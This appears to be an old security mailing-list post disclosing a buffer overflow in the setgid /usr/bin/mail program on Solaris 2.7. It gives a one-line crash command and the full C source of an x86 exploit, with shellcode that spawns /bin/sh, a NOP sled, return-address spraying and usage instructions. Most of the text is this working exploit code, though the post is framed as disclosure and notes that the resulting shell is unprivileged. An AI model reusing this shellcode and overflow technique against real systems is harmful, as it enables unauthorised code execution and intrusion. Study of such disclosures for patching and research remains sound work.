solaris_bof.txt

`Subject: Solaris 2.7 /usr/bin/mail  
To: [email protected]   
  
  
Greetings,  
  
  
There is a possible buffer overflow vulnerability in Solaris 2.7's sgid  
mail /usr/bin/mail. The reason it's only a possibility and not a full  
blow exploit is that mail drops sgid privs before the overflow occurs.  
However as we've seen in several past posts, this is not necessarily a  
bulletproof method of making ones program secure. Obviously mail needs  
these privs to perform some function, probably opening the appropriate  
mail owned files to deliver mail. My guess would be that in the  
following usage, mail would need write (read?) access to foo's mail file.  
  
  
bash-2.02$ mail -m `perl -e "print 'A' x 2106"` foo  
.  
mail: ERROR signal 11  
bash-2.02$  
  
  
In any case, this overflow does allow execution of any command you wish  
as shown in the program at the end of this message. I would imagine that  
with some careful asm code, one would be able to exploit the specific  
vulnerability that may exist. Information on exactly what mail does with  
it's s bit would be helpful.  
  
  
Brock Tellier  
UNIX Systems Administrator  
Webley Systems  
www.webley.com  
  
  
--- solx86.c ---  
/*  
* Generic Solaris x86 exploit program by Brock Tellier  
* Shellcode by Cheez Whiz  
* gcc -o mailex solx86.c  
* /usr/bin/mail -m `./mailex 0 1985 2285` foo  
. <period, enter>  
$ <not a rootshell ;)>  
  
  
* Usage: ./mailex <offset> <NOPS> <BUFSIZE>  
*  
* Demonstrative program for mail vulnerability. mail apparently drops  
privs  
* before the overflow occurs so we're not going to have a sgid mail  
shell.  
* Perhaps someone could make some 'shellcode' to exploit an open file  
* descriptor or something (whatever the reason mail is sgid mail).  
*/  
  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <unistd.h>  
  
  
#define BUF 10000  
#define NOP 0x90  
  
  
char shell[] =  
"\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff"  
"\xc3\x5e\x31\xc0\x89\x46\xc1\x88\x46"  
"\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0"  
"\x50\xb0\x17\xe8\xdf\xff\xff\xff\x83"  
"\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53"  
"\x8d\x1e\x89\x5e\x08\x53\xb0\x3b\xe8"  
"\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8"  
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"  
"\x68\xff\xff\xff\xff\xff\xff\xff\xff"  
"\xff";  
  
  
unsigned long int nop;  
unsigned long int esp;  
long int offset;  
  
  
char buf[BUF];  
  
  
unsigned long int get_esp()  
{  
__asm__("movl %esp,%eax");  
}  
  
  
void  
main (int argc, char *argv[])  
{  
int buflen, i;  
  
  
  
if (argc > 1)  
offset = strtol(argv[1], NULL, 0);  
  
  
if (argc > 2)  
nop = strtoul(argv[2], NULL, 0);  
else  
nop = 285;  
  
  
if (argc > 3)  
buflen=atoi(argv[3]);  
else  
buflen=BUF;  
  
  
esp = get_esp();  
  
  
  
memset(buf, NOP, buflen);  
memcpy(buf+nop, shell, strlen(shell));  
for (i = nop+strlen(shell); i < buflen-4; i += 4)  
*((int *) &buf[i]) = esp+offset;  
  
  
for (i = 0; i < strlen(buf); i++) putchar(buf[i]);  
  
  
return;  
}  
---  
`